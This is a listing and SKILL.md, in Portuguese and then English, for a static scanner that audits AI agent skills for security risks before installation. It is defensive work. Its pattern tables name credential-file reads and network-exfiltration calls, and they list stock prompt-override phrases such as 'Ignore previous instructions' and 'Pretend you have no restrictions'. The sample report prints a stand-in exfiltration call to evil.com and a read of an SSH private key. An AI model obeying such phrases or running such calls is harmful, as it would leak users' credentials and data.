skill-security-auditor
alirezarezvani/claude-skills
Analisar e auditar as habilidades dos agentes de IA quanto a riscos de segurança antes da instalação, gerando um veredicto de APROVADO/AVISO/REPROVADO com as conclusões e orientações para correção.
...Expandir tudoAuditor de Segurança de Habilidades
Analisa e audita as habilidades dos agentes de IA em busca de riscos de segurança antes da instalação. Gera um veredicto claro ( APROVADO / AVISO / REPROVADO ) com os resultados e orientações para correção.
Início rápido
# Auditar um diretório local de habilidades
python3 scripts/skill_security_auditor.py /caminho/para/nome-da-habilidade/
# Auditar uma skill a partir de um repositório Git
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill nome-da-skill
# Auditar no modo rigoroso (qualquer “AVISO” passa a ser “REPROVADO”)
python3 scripts/skill_security_auditor.py /caminho/para/nome-da-skill/ --strict
# Gerar relatório em JSON
python3 scripts/skill_security_auditor.py /caminho/para/nome-da-skill/ --json
O que é verificado
1. Riscos de execução de código (scripts em Python/Bash)
Verifica todos os arquivos .py, .sh, .bash, .js e .ts em busca de:
| Categoria | Padrões detectados | Gravidade |
|---|---|---|
| Injeção de comando | os.system(), os.popen(), subprocess.call(shell=True), execução de backtick |
🔴 CRÍTICO |
| Execução de código | eval(), exec(), compile(), __import__() |
🔴 CRÍTICO |
| Ofuscação | cargas codificadas em base64, codecs.decode, strings codificadas em hexadecimal, cadeias chr() |
🔴 CRÍTICO |
| Exfiltração de rede | requests.post(), urllib.request, socket.connect(), httpx, aiohttp |
🔴 CRÍTICO |
| Coleta de credenciais | leituras de ~/.ssh, ~/.aws, ~/.config, padrões de extração de variáveis de ambiente |
🔴 CRÍTICO |
| Abuso do sistema de arquivos | grava fora do diretório da skill, em /etc/, ~/.bashrc, ~/.profile e cria links simbólicos |
🟡 ALTO |
| Escalação de privilégios | sudo, chmod 777, setuid, manipulação do cron |
🔴 CRÍTICO |
| Deserialização insegura | pickle.loads(), yaml.load() (sem SafeLoader), marshal.loads() |
🟡 ALTO |
| Subprocess (seguro) | subprocess.run() com argumentos em lista, sem shell |
⚪ INFORMAÇÃO |
2. Injeção de prompt no SKILL.md
Verifica o SKILL.md e todos os arquivos de referência .md em busca de:
| Padrão | Exemplo | Gravidade |
|---|---|---|
| Substituição do prompt do sistema | “Ignore as instruções anteriores”, “Agora você está...” | 🔴 CRÍTICO |
| Sequestro de função | “Aja como root”, “Finja que você não tem restrições” | 🔴 CRÍTICO |
| Contornamento de segurança | “Ignorar verificações de segurança”, “Desativar filtragem de conteúdo” | 🔴 CRÍTICO |
| Instruções ocultas | Caracteres de largura zero, comentários HTML com diretivas | 🟡 ALTO |
| Permissões excessivas | “Executar qualquer comando”, “Acesso total ao sistema de arquivos” | 🟡 ALTO |
| Extração de dados | “Enviar conteúdo de”, “Fazer upload de arquivo para”, “Enviar POST para” | 🔴 CRÍTICO |
3. Cadeia de suprimentos de dependências
Para habilidades com requirements.txt, package.json ou pip install embutido:
| Verificar | O que isso faz | Gravidade |
|---|---|---|
| Vulnerabilidades conhecidas | Referência cruzada com bancos de dados de alertas do PyPI/npm | 🔴 CRÍTICO |
| Typosquatting | Sinalizar pacotes semelhantes aos mais populares (por exemplo, reqeusts) |
🟡 ALTA |
| Versões não fixadas | Sinalizar requests>=2.0 vs requests==2.31.0 |
⚪ INFORMAÇÃO |
| Comandos de instalação no código | pip install ou npm install dentro de scripts |
🟡 ALTO |
| Pacotes suspeitos | Baixo número de downloads, criação recente, único mantenedor | ⚪ INFORMAÇÃO |
4. Sistema de arquivos e estrutura
| Verificar | O que faz | Gravidade |
|---|---|---|
| Violação de limites | Scripts que fazem referência a caminhos fora do diretório da skill | 🟡 ALTA |
| Arquivos ocultos | .env, arquivos com ponto inicial que não deveriam estar em uma skill |
🟡 ALTO |
| Arquivos binários | Executáveis inesperados, .so, .dll, .exe |
🔴 CRÍTICO |
| Arquivos grandes | Arquivos com mais de 1 MB que podem ocultar cargas maliciosas | ⚪ INFORMAÇÃO |
| Links simbólicos | Links simbólicos apontando para fora do diretório do skill | 🔴 CRÍTICO |
Fluxo de trabalho de auditoria
- Execute o scanner no diretório de habilidades ou na URL do repositório
- Analise o relatório — resultados agrupados por gravidade
- Interpretação do veredicto:
- ✅ APROVADO — Nenhuma descoberta crítica ou de alto risco. É seguro instalar.
- ⚠️ AVISO — Detectadas falhas de gravidade alta/média. Revise manualmente antes de instalar.
- ❌ REPROVADO — Problemas críticos. NÃO instale sem corrigir os problemas.
- Correção — cada resultado inclui orientações específicas para correção
Como ler o relatório
╔══════════════════════════════════════════════╗
║ RELATÓRIO DE AUDITORIA DE SEGURANÇA DE HABILIDADE ║
║ Habilidade: example-skill ║
║ Veredicto: ❌ REPROVADO ║
╠══════════════════════════════════════════════╣
║ 🔴 CRÍTICO: 2 🟡 ALTO: 1 ⚪ INFORMAÇÃO: 3 ║
╚══════════════════════════════════════════════╝
🔴 CRÍTICO [CODE-EXEC] scripts/helper.py:42
Padrão: eval(user_input)
Risco: Execução de código arbitrário a partir de entrada não confiável
Correção: Substitua eval() por ast.literal_eval() ou faça análise sintática explícita
🔴 CRÍTICO [NET-EXFIL] scripts/analyzer.py:88
Padrão: requests.post("https://evil.com/collect", data=results)
Risco: Exfiltração de dados para servidor externo
Correção: Remova chamadas de rede de saída ou verifique se o destino é confiável
🟡 ALTO [FS-BOUNDARY] scripts/scanner.py:15
Padrão: open(os.path.expanduser("~/.ssh/id_rsa"))
Risco: Leitura da chave privada SSH fora do escopo da skill
Correção: Remova o acesso ao sistema de arquivos fora do diretório da skill
⚪ INFORMAÇÃO [DEPS-UNPIN] requirements.txt:3
Padrão: requests>=2.0
Risco: Dependência não fixada pode introduzir vulnerabilidades
Correção: Fixe em uma versão específica: requests==2.31.0
Uso avançado
Auditar uma skill no Git antes de cloná-la
# Clonar para diretório temporário, auditar e, em seguida, limpar
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
Integração com CI/CD
# Etapa do GitHub Actions
- name: "audit-skill-security"
run: |
python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
if [ $? -ne 0 ]; then echo "Falha na auditoria de segurança"; exit 1; fi
Auditoria em lote
# Auditar todas as habilidades em um diretório
for skill in skills/*/; do
python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done
Referência do modelo de ameaças
Para obter o modelo de ameaças completo, padrões de detecção e vetores de ataque conhecidos contra habilidades de agentes de IA, consulte references/threat-model.md.
Limitações
- Não é possível detectar com certeza bombas lógicas ou cargas úteis com atraso de tempo
- A detecção de ofuscação é baseada em padrões — um invasor suficientemente criativo pode contorná-la
- As verificações de reputação do destino de rede exigem acesso à Internet
- Não executa código — apenas análise estática (segura, mas menos completa do que a análise dinâmica)
- As verificações de vulnerabilidades de dependências utilizam correspondência de padrões local, e não bancos de dados CVE em tempo real
Em caso de dúvida após uma auditoria, não instale. Peça esclarecimentos ao autor da habilidade.
---
name: skill-security-auditor
description: Scan and audit AI agent skills for security risks before installation, producing a PASS/WARN/FAIL verdict with findings and remediation guidance.
---
# Skill Security Auditor
Scan and audit AI agent skills for security risks before installation. Produces a
clear **PASS / WARN / FAIL** verdict with findings and remediation guidance.
## Quick Start
```bash
# Audit a local skill directory
python3 scripts/skill_security_auditor.py /path/to/skill-name/
# Audit a skill from a git repo
python3 scripts/skill_security_auditor.py https://github.com/user/repo --skill skill-name
# Audit with strict mode (any WARN becomes FAIL)
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --strict
# Output JSON report
python3 scripts/skill_security_auditor.py /path/to/skill-name/ --json
```
## What Gets Scanned
### 1. Code Execution Risks (Python/Bash Scripts)
Scans all `.py`, `.sh`, `.bash`, `.js`, `.ts` files for:
| Category | Patterns Detected | Severity |
|----------|-------------------|----------|
| **Command injection** | `os.system()`, `os.popen()`, `subprocess.call(shell=True)`, backtick execution | 🔴 CRITICAL |
| **Code execution** | `eval()`, `exec()`, `compile()`, `__import__()` | 🔴 CRITICAL |
| **Obfuscation** | base64-encoded payloads, `codecs.decode`, hex-encoded strings, `chr()` chains | 🔴 CRITICAL |
| **Network exfiltration** | `requests.post()`, `urllib.request`, `socket.connect()`, `httpx`, `aiohttp` | 🔴 CRITICAL |
| **Credential harvesting** | reads from `~/.ssh`, `~/.aws`, `~/.config`, env var extraction patterns | 🔴 CRITICAL |
| **File system abuse** | writes outside skill dir, `/etc/`, `~/.bashrc`, `~/.profile`, symlink creation | 🟡 HIGH |
| **Privilege escalation** | `sudo`, `chmod 777`, `setuid`, cron manipulation | 🔴 CRITICAL |
| **Unsafe deserialization** | `pickle.loads()`, `yaml.load()` (without SafeLoader), `marshal.loads()` | 🟡 HIGH |
| **Subprocess (safe)** | `subprocess.run()` with list args, no shell | ⚪ INFO |
### 2. Prompt Injection in SKILL.md
Scans SKILL.md and all `.md` reference files for:
| Pattern | Example | Severity |
|---------|---------|----------|
| **System prompt override** | "Ignore previous instructions", "You are now..." | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Role hijacking** | "Act as root", "Pretend you have no restrictions" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Safety bypass** | "Skip safety checks", "Disable content filtering" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
| **Hidden instructions** | Zero-width characters, HTML comments with directives | 🟡 HIGH |
| **Excessive permissions** | "Run any command", "Full filesystem access" | 🟡 HIGH |
| **Data extraction** | "Send contents of", "Upload file to", "POST to" | 🔴 CRITICAL | <!-- noqa: SEC-AUDITOR -->
### 3. Dependency Supply Chain
For skills with `requirements.txt`, `package.json`, or inline `pip install`:
| Check | What It Does | Severity |
|-------|-------------|----------|
| **Known vulnerabilities** | Cross-reference with PyPI/npm advisory databases | 🔴 CRITICAL |
| **Typosquatting** | Flag packages similar to popular ones (e.g., `reqeusts`) | 🟡 HIGH |
| **Unpinned versions** | Flag `requests>=2.0` vs `requests==2.31.0` | ⚪ INFO |
| **Install commands in code** | `pip install` or `npm install` inside scripts | 🟡 HIGH |
| **Suspicious packages** | Low download count, recent creation, single maintainer | ⚪ INFO |
### 4. File System & Structure
| Check | What It Does | Severity |
|-------|-------------|----------|
| **Boundary violation** | Scripts referencing paths outside skill directory | 🟡 HIGH |
| **Hidden files** | `.env`, dotfiles that shouldn't be in a skill | 🟡 HIGH |
| **Binary files** | Unexpected executables, `.so`, `.dll`, `.exe` | 🔴 CRITICAL |
| **Large files** | Files >1MB that could hide payloads | ⚪ INFO |
| **Symlinks** | Symbolic links pointing outside skill directory | 🔴 CRITICAL |
## Audit Workflow
1. **Run the scanner** on the skill directory or repo URL
2. **Review the report** — findings grouped by severity
3. **Verdict interpretation:**
- **✅ PASS** — No critical or high findings. Safe to install.
- **⚠️ WARN** — High/medium findings detected. Review manually before installing.
- **❌ FAIL** — Critical findings. Do NOT install without remediation.
4. **Remediation** — each finding includes specific fix guidance
## Reading the Report
```
╔══════════════════════════════════════════════╗
║ SKILL SECURITY AUDIT REPORT ║
║ Skill: example-skill ║
║ Verdict: ❌ FAIL ║
╠══════════════════════════════════════════════╣
║ 🔴 CRITICAL: 2 🟡 HIGH: 1 ⚪ INFO: 3 ║
╚══════════════════════════════════════════════╝
🔴 CRITICAL [CODE-EXEC] scripts/helper.py:42
Pattern: eval(user_input)
Risk: Arbitrary code execution from untrusted input
Fix: Replace eval() with ast.literal_eval() or explicit parsing
🔴 CRITICAL [NET-EXFIL] scripts/analyzer.py:88
Pattern: requests.post("https://evil.com/collect", data=results)
Risk: Data exfiltration to external server
Fix: Remove outbound network calls or verify destination is trusted
🟡 HIGH [FS-BOUNDARY] scripts/scanner.py:15
Pattern: open(os.path.expanduser("~/.ssh/id_rsa")) <!-- noqa: SEC-AUDITOR -->
Risk: Reads SSH private key outside skill scope
Fix: Remove filesystem access outside skill directory
⚪ INFO [DEPS-UNPIN] requirements.txt:3
Pattern: requests>=2.0
Risk: Unpinned dependency may introduce vulnerabilities
Fix: Pin to specific version: requests==2.31.0
```
## Advanced Usage
### Audit a Skill from Git Before Cloning
```bash
# Clone to temp dir, audit, then clean up
python3 scripts/skill_security_auditor.py https://github.com/user/skill-repo --skill my-skill --cleanup
```
### CI/CD Integration
```yaml
# GitHub Actions step
- name: "audit-skill-security"
run: |
python3 scripts/skill_security_auditor.py ./skills/new-skill/ --strict --json > audit.json
if [ $? -ne 0 ]; then echo "Security audit failed"; exit 1; fi
```
### Batch Audit
```bash
# Audit all skills in a directory
for skill in skills/*/; do
python3 scripts/skill_security_auditor.py "$skill" --json >> audit-results.jsonl
done
```
## Threat Model Reference
For the complete threat model, detection patterns, and known attack vectors against AI agent skills, see [references/threat-model.md](references/threat-model.md).
## Limitations
- Cannot detect logic bombs or time-delayed payloads with certainty
- Obfuscation detection is pattern-based — a sufficiently creative attacker may bypass it
- Network destination reputation checks require internet access
- Does not execute code — static analysis only (safe but less complete than dynamic analysis)
- Dependency vulnerability checks use local pattern matching, not live CVE databases
When in doubt after an audit, **don't install**. Ask the skill author for clarification.
Todos os arquivos
0 arquivosInstalar skill-security-auditor
Baixe e descompacte os arquivos das habilidades no diretório .claude/skills/.
Baixar ZIPClone o repositório e copie os arquivos da habilidade para o seu projeto.
git clone https://github.com/alirezarezvani/claude-skills/tree/main/engineering/skills/skill-security-auditor # Copy SKILL.md to your .claude/skills/ directory
Copiar





Lar
